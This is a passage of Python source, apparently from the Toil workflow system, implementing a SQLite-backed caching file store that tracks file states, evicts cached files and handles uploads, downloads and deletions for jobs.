# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self._write([('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'deleting')),
('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'downloading')),
('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))])
            logger.debug('Tried to adopt file operations from dead worker %s', owner)
@classmethod
def _executePendingDeletions(cls, workDir, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param str workDir: The Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
me = get_process_name(workDir)
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (me, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
except OSError:
# Probably already deleted
continue
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
# Also drop their references, if they had any from dead downloaders.
cls._staticWrite(con, cur, [('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting')),
('DELETE FROM refs WHERE file_id = ?', (fileID,))])
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
me = get_process_name(self.workDir)
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', me)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
rowCount = self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))])
if rowCount != 1:
# We didn't manage to update it. Someone else (a running job if
                # we are a committing thread, or vice versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, filePath)
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
self._staticWrite(con, cur, [('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))])
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
me = get_process_name(self.workDir)
self._write([('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, me))])
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cls._staticWrite(con, cur, [('DELETE FROM refs WHERE job_id = ?', (jobID,))])
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cls._staticWrite(con, cur, [('DELETE FROM jobs WHERE id = ?', (jobID,))])
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.workDir, self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
            # Or someone might be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
me = get_process_name(self.workDir)
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self._write([("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'deleting', fileID, 'cached'))])
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
        if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
            # We deleted something
            logger.debug('Successfully executed pending deletions to free space')
            return True
        return False
def _freeUpSpace(self):
"""
        If disk space is overcommitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
        # This is the longest that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.workDir, self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup)
# Work out who we are
me = get_process_name(self.workDir)
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self._write([('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', me)),
('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))])
if absLocalFileName.startswith(self.localTempDir):
# We should link into the cache, because the upload is coming from our local temp dir
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Linked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# The tests insist that if you are uploading a file from outside
# the local temp dir, it should not be linked into the cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be.
# And drop the file altogether.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID)),
('DELETE FROM files WHERE id = ?', (fileID,))])
# Save the file to the job store right now
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
                raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
if cache:
# We want to use the cache
if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))])
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))])
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, localFilePath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
if self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, cachedPath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self._write([("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'downloading', fileStoreID, 'cached'))])
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
time.sleep(self.contentionBackoff)
# OK, now we have space to make a copy.
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make the copy
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress before re-polling.
time.sleep(self.contentionBackoff)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make our copy
atomic_copy(cachedPath, localFilePath)
# Change our reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
:rtype: bool
"""
# Work out who we are
me = get_process_name(self.workDir)
# See if we actually own this file and can give it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# Don't fake a delay here; this should be a rename always.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID)),
('DELETE FROM files WHERE id = ?', (fileStoreID,))])
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
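# Illustrative use of _createLinkFromCache (the paths here are hypothetical):
#
#   if self._createLinkFromCache('/workDir/cache/tmpabc123', localFilePath, symlink=False):
#       # localFilePath now shares storage with the cached copy via a hard link
#       pass
#   else:
#       # no link could be made (e.g. cross-device); fall back to copying
#       pass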
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists.
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
logger.debug('Trying to make file record and reference for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me)),
('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self._write([('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))])
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress.
time.sleep(self.contentionBackoff)
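# Note: compared with _readGlobalFileMutablyWithCache, the immutable path above
# first tries to link against the cached copy and only falls back to the
# mutable (copying) code path when neither a hard link nor a symlink can be made.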
def readGlobalFileStream(self, fileStoreID):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
for path in deleted:
# Drop the references
self._write([('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))])
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
# Delete local copies for this job
self.deleteLocalFile(fileStoreID)
# Work out who we are
me = get_process_name(self.workDir)
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self._write([('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', me, fileStoreID))])
# Finish the delete if the file is present
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(str(fileStoreID))
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
